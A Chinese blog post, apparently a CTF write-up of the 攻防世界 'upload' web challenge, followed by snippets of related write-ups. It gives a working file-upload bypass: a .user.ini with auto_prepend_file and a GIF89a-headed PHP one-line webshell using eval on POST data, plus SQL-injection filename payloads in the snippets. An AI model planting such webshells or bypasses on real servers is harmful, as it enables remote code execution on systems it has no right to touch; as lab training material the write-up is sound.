攻防世界-web-ctf-upload

于 2024-08-09 10:37:24 发布
阅读量345 收藏 6
点赞数 5
分类专栏: ctf 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52484587/article/details/141055555
版权

题目场景

查看源码

 毫无有效的数据

官方WriteUp

本题需要利用文件上传漏洞点,通过绕过服务器的安全防护,达到getshell的目的

本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行

这里需要绕过的点如下

检查文件内容是否有php字符串
 
检查后缀中是否有htaccess或ph
 
检查文件头部信息
 
文件MIME类型

对于第一点可以利用短标签绕过,例如<?=phpinfo();?>

对于第二点可以通过上传.user.ini以及正常jpg文件来进行getshell,可以参考以下文章

.user.ini文件构成的PHP后门 - phith0n

在服务器中,只要是运用了fastcgi的服务器就能够利用该方式getshell,不论是apache或者ngnix或是其他服务器。
这个文件是php.ini的补充文件,当网页访问的时候就会自动查看当前目录下是否有.user.ini,然后将其补充进php.ini,并作为cgi的启动项。
其中很多功能设置了只能php.ini配置,但是还是有一些危险的功能可以被我们控制,比如auto_prepend_file。

第三点绕过方式即在文件头部添加一个图片的文件头,比如GIF89a

第四点绕过方法即修改上传时的Content-Type

因此最终的payload为:
上传.user.ini,内容为

GIF89a                  
auto_prepend_file=a.jpg

上传a.jpg,内容为

GIF89a
<?=eval($_POST['cmd']);?>

BP抓包

上传.user.ini

 

再上传a.jpg

 

 

F12查看文件去向

 蚁剑连接

 

找到flag 

oliveira-time
关注
专栏目录
【网络安全 | CTF攻防世界 upload1 解题详析
等风来
05-24 4623
该代码通过扩展 Array 原型对象添加了一个名为 contains 的函数,用于判断一个对象是否在数组中,主要应用于判断上传文件的扩展名是否属于指定的图片格式,这里是 [‘jpg’,‘png’]这段代码的作用是检查上传文件的扩展名是否符合要求,如果是图片格式(jpg或png),则启用提交按钮,否则禁用提交按钮并弹出提示消息。若文件上传成功,则在上传路径对应的页面会输出。考察文件上传,具体原理及姿势不再赘述。抓包,修改filename文件后缀为。无Error回显,说明木马上传成功。
攻防世界-web高手进阶区
zji
04-25 6527
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界-upload
qq_44065556的博客
09-24 1177
进入场景映入眼帘 需要注册账号 注册好之后,登录跳转页面 突破点应该就在这里了 我们先上传一个php文件 显示不正确的文件扩展名,被拦了 用burp抓包改信息 成功上传 但是没有上传路径 只能上传不能利用 思考(题目给的是upload,给的引导思路 就是上传文件拿flag) 我试着上传jpg,png格式的图片文件 有文件名回显,这说明文件已经被传到了数据库中,游览器又从数据库中读取了上传的文件,那么这个过程久有可能触发sql注入 ...
攻防世界upload
qq_51744055的博客
05-03 682
Hex()是MySQL的Sring函数。 此方法返回给定数字或字符串的十六进制字符串 a' +(selselectect conv(substr(hex(database()),1,12),16,10))+ '.jpg 数据库名变成16进制 选取从第一个字母开始,往后数12个字母 hex 16进制再16进制 CONV(n,from_radix,to_radix):用于将n从from_radix进制转到to_radix进制 substr(str,start,length):将str从st
攻防世界-web-upload
wuh2333的博客
12-13 1179
攻防世界webupload,sql注入
攻防世界upload1
金 帛的博客
04-24 2358
攻防世界之文件上传
WEB漏洞攻防 - 文件上传漏洞 - CTF比赛类应用场景 - [RoarCTF 2024]Simple Upload
最新发布
2401_84009317的博客
04-21 807
现在我们去搜索 “ThinkPHP3.2版本” 开发手册,找到 URL 模块的相关文档,了解 “ThinkPHP3.2版本” 如何通通过 URL 对应的代码关系请求到访问的文件从 “ThinkPHP3.2版本” 开发手册中我们了解到 “PATHINFO模式” 是系统的默认 URL 模式,提供了最好的 SEO 支持,系统内部已经做了环境的兼容处理,所以能够支持大多数的主机环境。PATHINFO地址的前三个参数分别表示模块/控制器/操作。示例:参考上面的 URL 链接模块 --> home控制器 --
攻防世界CTF题:upload1
Aixwei的博客
04-11 1045
发现这里有个onchange事件,大概写了个前端的文件check,那我们在前端把它删掉再上传文件试试。发现了 disabled属性,我们把它删掉之后上传按键可以点击了,此时点击上传,可以看到上传成功。细看当前页面,发现上传按钮灰掉了,但是上传的文件还保留在前端并没有删除,此时再查看前端代码,最后,通过上传图片类型的木马,再通过bp抓包修改后缀绕过前端验证也是可以的成功。发现这里弹窗提示你要上传图片,可能是前端验证文件格式,所以先看一下源代码,我们先正常上传一句话木马,被拦截后点击确定,
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
这个资源库"CTF-AWD-WEB-master"提供的试题将帮助参与者提升他们的实战技能,深入理解Web安全攻防的原理,并能够在实际环境中应用这些知识。通过解题,不仅可以锻炼漏洞挖掘和修复能力,还可以提升安全意识,对于...
upload(simple)
02-07
自己写的,感兴趣的可以下载看看,对初学者有用,可以起参考作用。
攻防世界upload1
bjml_的博客
11-06 820
攻防世界upload1
攻防世界的里的upload1
一大口木的博客
05-23 610
点击后的页面看一下我的一句话木马。
攻防世界-web-upload1
wuh2333的博客
05-21 314
攻防世界upload1
攻防世界upload1(web
yuanxu8877的博客
11-22 1141
攻防世界web-upload1
攻防世界upload3
qq_28808571的博客
05-25 809
1.看到题目为文件上传,且题目描述中有源码泄露。将源码下载后发现为thinkphp5.1,于是直接百度发现thinkphp5.x的反序列化漏洞,但是由于源码中含有查找文件,一开始误以为是文件名注入. 但对源码的审计发现,对上传的文件检查还是比较严格的 还检查了文件头,但是可以使用GIF89a+一句话还是能够上传成功的,上传成功后可以在上传界面查看源码得到路径 结合源码发现这是 ...
攻防世界XCTFupload
末初的CSDN博客
03-08 865
这里有个注册登入,迷惑行为,漏洞不在这里 这题比较意外,不是上传题是sql注入而且还是文件名的SQL注入, 因为回显的只是文件名,然后它存入数据库的也可能是文件名,既然连接了数据库就可能存在注入漏洞。然后就能想到可能是文件名sql注入。 任何与数据库发生连接交互的地方都可能存在SQL注入! 然后就开始构造文件名的payload,首先介绍几个函数。 conv(N,from_base,to_ba...
【愚公系列】2023年06月 攻防世界-Webupload
时光隧道
06-20 6889
SQL注入的16进制绕过是指攻击者使用16进制编码绕过输入过滤和防御措施,从而执行恶意的SQL语句。例如,当输入过滤器检测到单引号时,它可能会将其替换为两个单引号,以避免SQL注入攻击。然而,攻击者可以使用16进制编码来绕过这一过滤器。这里的0x27是单引号的16进制编码,而0x2720656e7472616e63652070617373776f7264是" 'entrance password "的16进制编码,用来代替密码字段。攻击者可以使用类似的技术来绕过其他类型的输入过滤器和防御措施。
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值